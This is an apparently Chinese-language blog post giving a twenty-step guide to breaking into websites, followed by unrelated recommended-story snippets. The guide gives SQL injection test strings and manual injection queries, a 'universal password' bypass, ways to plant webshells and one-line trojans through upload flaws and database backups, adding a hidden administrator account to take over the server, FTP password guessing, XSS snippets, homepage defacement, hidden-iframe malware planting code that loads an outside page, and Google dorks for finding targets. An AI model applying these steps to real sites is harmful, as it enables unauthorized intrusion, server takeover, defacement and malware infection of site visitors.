網站入侵思路之滲透篇

1,〓經典注入〓

? ? 通常,判斷一個網站是否存在注入點,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1

,%20and%201=2,來判斷,

如果and 1=1正常返回頁面,1=2錯誤,或者找不到,那么就存在注入點

? ? 2,〓萬能密碼OR漏洞〓

? ? 萬能密碼'or'='or',可以用在后臺管理輸入,有的網站由于沒有過濾OR漏洞,輸入OR直接就可以突破,一般漏洞

存在于ASP類型的網站

? 3,〓爆庫〓

? 爆庫,可以理解為爆出數據庫下載,用爆庫之類的工具可以直接就獲得管理員用戶和密碼,%5C為十六進制的

\符號,而數據庫大于5.0

就可以進行爆庫,如在PHP手工高級注入時,用VERSION()這個變量猜出網站數據庫版本,如果一個網站數據

庫大于5.0,且是ACESS

數據庫,那么提交地址是:http://www.520jsj.com/rpc/show24.asp?id=127,我們直接把%5C加到RPC后面,因為

%5C是爆二級目錄,所以

應該是這樣,http://www.520jsj.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理員為了防止他人非

法下載數據庫,而把數據

庫改成#database.mdb,這樣防止了,如果頁面地址為http://www.xx.com/rpd/#database.mdb,是這樣的,那么我

們把%23加到替換#

,http://www.xx.com/rpd/%23database.mdb

4,〓COOKIE中轉,SQL防注入程序,提醒你IP已被記錄〓

COOKIE中轉,SQL防注入,如果檢測一個網站時,彈出這樣一個對話框,上面出現SQL防注入程序提醒的字

語,那么我們可以利用

COOKIE中轉,注入中轉來突破,方法是先搭建一個ASP環境(且網站為ASP網站),然后打開中轉工具,記

住一個網站的頁面地址

粘貼進工具里,值是多少就寫多少,生成,把生成的文件放到目錄里,接下來,打開網頁,輸入http://127.0.

0.1端口)/目錄里文

件,如果正常,那么輸入http://127.0.0.1:端口/值(目錄文件)?提交值,那么拿到工具里猜表名,列名了

5, 〓手工〓

ASP手工語句? 表名 and exists (select * from 表名)

? ? ? ? ? ? ? ? ? ? ? ? ? ? 列名 and (select count(列名) from 表名)>0

? ? ? ? ? ? ? ? ? ? ? ? ? ? 長度 and (select top 1 len(username) from admin)>0

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 內容 and (select top 1 asc(mid(username,1,1)) from admin)>100

PHP手工語句:order by(猜字段),and 1=2 union select (字段數)and 1=2 union selsect from(位置)

如果有30個字段,那么就應該在注入地址后輸入http://www.520jsj.com/showfo.jsp?id=130 and 1=2 union

select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28.29,30

幾個常用變量 ,USER(),VERSION()<數據庫版本),database()<數據庫名稱>

6,〓抓包拿WEBSHELL〓

如果進入后臺發現,點數據庫備份的時候發現找不到,可以通過抓包來獲得上傳,拿到WEBSHELL,工具

WOSCK抓包,一張圖片

,一個ASP馬,自行搭建一個上傳地址,UPLOAD加載,UPFILE上傳,COOKIS=( )

7,〓數據庫備份拿WEBSHELL和一句話木馬入侵〓

通常進入后臺了,發現有數據庫備份,拿WEBSHELL吧,找一個添加產品的地方,傳一個大馬,格式為

JPG圖片,然后把圖片地址

粘貼到數據庫備份那里,給起個名字,如SHELL.ASP,然后合地址訪問的時候就進入webshell了,一句話

木馬入侵,先編輯記事本,

加入一句話,改為2.jpg,然后備份,訪問,發現500內部服務器錯誤,證明一句話成功,接下來用一句話

木馬客戶端連接,得到路徑

頁面,然后改下馬名,輸入大馬內容,提交,得到WEBSHELL

8,〓DB權限差異備份拿WEBSHELL〓

如果一個網站注入點是MYSQL數據庫,且是DB權限,或者是SA權限,能夠列目錄,那么就好辦了,找

到網站的目錄,目錄通常在

D和E盤,備份個小馬,合地址訪問看看成功沒,直接備份大馬貌似不行,成功后,再輸入大馬內容,拿

到WEBSHELL

9,〓找后臺〓

找后臺,一般默認為admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp

,login.asp,logon,user.asp,

admin/index.asp,當然,這只是默認,一些大網站不可能還用admin作為后臺,有的隱藏很深,可以簡單

用site:網站 inurl:后臺

來猜,或者下載源HTML文件分析找出后臺,或者用各種工具來掃描了,方法很多的

10,〓腳本提示〓

有的網站要求進入后臺會出現一個腳本提示,就像VB編程里INPUTBOX “”,一個對話輸入框,我們輸入

administrator突破,

admin代表以管理員身份來進入

11,〓php后門和EWEBEDITOR編輯器入侵〓

PHP后門,如之前爆出的DISZ漏洞,在一個PHP網站后面加C.PHP,如果出現1,那么傳個PHP馬就拿到

WEBSHELL,

EWEBEDITOR編輯器入侵,是很快速的方式,設置好上傳文件類型,傳ASA,或者其他的格式,然后

訪問拿到WEBSHELL

,如沒有直接加語句拿到WEBSHELL

12,〓上傳漏洞〓

有的網站雖然沒有注入點,但存在一個上傳漏洞,那么我們如何來利用了,首先,打開上傳地址看是

否存在,如果有,試想傳一個ASP大馬是不行的,那么傳一句話看看,先看能成功不,用明小子來上傳,動網,

動力,動感,喬客4種方式,頁面地址格式要對應,如果一個網站地址彈出對話框,顯示上傳成功,那么證明可以拿到

WEBSHELL,傳馬,另外有的沒有任何顯示,直接空的,那么可以構建兩個上傳,第一個傳JPG的圖片,第二個傳ASP

馬(大馬),記住,大馬后面要有個空格才行,如果一個網站地址出現文件類型不正確,請重新上傳,那么證明%90可

以拿到WEBSHELL,只是格式不對,不允許,改后綴,只要是網站沒有過濾的格式,如果一個網站地址顯示請登陸再

上傳,那么證明沒有拿到COOKIS,思路是在該網站注冊一個用戶,得到COOKIS,然后上傳就成功了

13,〓簡單提權拿下服務器和SERV提權和pcanywhere三方提權〓

簡單拿下服務器,也就是拿下網站IP主機,首先我們需要一個WEBSHELL,然后看看組件信息,

看看路徑可讀可以寫不,如果有一個可以,那么來到CMD命令下,首先輸入可寫的文件內容,執行命令加一個

帳號和最高管理權限,然后輸入netstat -an,得到主機連接端口,然后用3389連接進入,讓其成為肉雞(最好),這

樣比較隱蔽我們操作

14,〓反查入侵和旁注和社會工程學〓

反查IP入侵,也就是入侵21,端口,首先我們入侵網站先PING WWW.520jsj.com ,出IP,然后到反

查IP站點查掛了多少個域名,接下來,添加webmaster@地址,加入字典,(里面多收集可能的口令,如123,

321,456),然后用流光探測密碼,登陸ftp://ip,輸入用戶和密碼,改掉信息等等,社會工程學X-WAY,來得到FTP

密碼,也需要收集,并不是每個都行,總之是自己的經驗

15,〓跨站腳本攻擊〓

跨站(CSS),被動攻擊,現在需要更多的思路和經驗了

三段經典跨站代碼

<script>alert("跨站開始")</script>

<script>alert("document.cookie")</script>

<script>window.open(http://www.baidu.com)</script>

16〓特殊空格〓

利用TAB制作的特殊空格,然后注冊時輸入空格,加管理名字,隨便在網站上找個斑竹,或者管理

的名字,這樣來注冊,有時自己注冊的這個也會變成管理員

17,〓改主頁〓

改主頁,拿到WEBSHELL后,先找出首頁文件,一般為index.asp,index.php.index.jsp,index.html,

然后來到站點根目錄,編輯index.asp(首頁),清空,最好備份,輸入自己的主頁代碼(黑頁),保存,再訪

問時已經變成自己想要的結果了

18,〓掛馬〓

首先在WEBSHELL里,建立一個文本,改為1.htm,接下來在主頁最下面掛

兩段經典掛馬代碼

<html>

<iframe src="http://www.x520jsj.com/2.htm" width="0" height="0" frameborder="0"></iframe>

</html>

<SCRIPT language=javascript>? ? ? ?

window.open("http://www.520jsj.com/2.htm","","toolbar=no,location=no,directories=no,status=

no,menubar=no,scrollbars=no,width=1,height=1");?

</script>

19 〓 GOOGLE BACK語句〓(很多)

inurl:asp?id=? ? ,inurl:show.asp ,inurl:went.asp ,inurl:jsp?id=,inurl:php?id=

20,〓自尋漏洞〓

自己根據自己的技術經驗和積累

?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 230,501評論 6 544
  • 序言:濱河連續發生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發現死者居然都...
    沈念sama閱讀 99,673評論 3 429
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 178,610評論 0 383
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,939評論 1 318
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 72,668評論 6 412
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
    開封第一講書人閱讀 56,004評論 1 329
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 44,001評論 3 449
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 43,173評論 0 290
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當地人在樹林里發現了一具尸體,經...
    沈念sama閱讀 49,705評論 1 336
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 41,426評論 3 359
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發現自己被綠了。 大學時的朋友給我發了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,656評論 1 374
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 39,139評論 5 364
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發生泄漏。R本人自食惡果不足惜,卻給世界環境...
    茶點故事閱讀 44,833評論 3 350
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 35,247評論 0 28
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,580評論 1 295
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 52,371評論 3 400
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 48,621評論 2 380

推薦閱讀更多精彩內容

  • 黑客在入侵企業網站時,通常要通過各種方式獲取webshell從而獲得企業網站的控制權,然后方便進行之后的入侵行為。...
    查無此人asdasd閱讀 3,785評論 0 3
  • 1、到Google搜索,site:cq.cn inurl:asp 2、到Google,搜索一些關鍵字,edit.a...
    Safesonic閱讀 9,720評論 5 8
  • 都說女兒是老爸上輩子的情人,還真不假!看著神經乃爸對甜馨精心的呵護,看著冠軍老爸對奧莉嚴厲的教育,看著豪氣吳尊對N...
    _辰希悅閱讀 327評論 0 1
  • 我聽著一個人的情歌 臉上笑著很落寞 帶著虛偽的做作 遠處的那個角落 你和他們笑著很快樂 面前的紙上劃滿 不知所謂的...
    不忍風塵閱讀 427評論 0 0
  • 先展示查詢的效果: (1)幾何圖形空間查詢: (2)Buffer空間查詢: (3)查詢函數 PostGIS空間查詢...
    宥_Hugh閱讀 5,612評論 7 2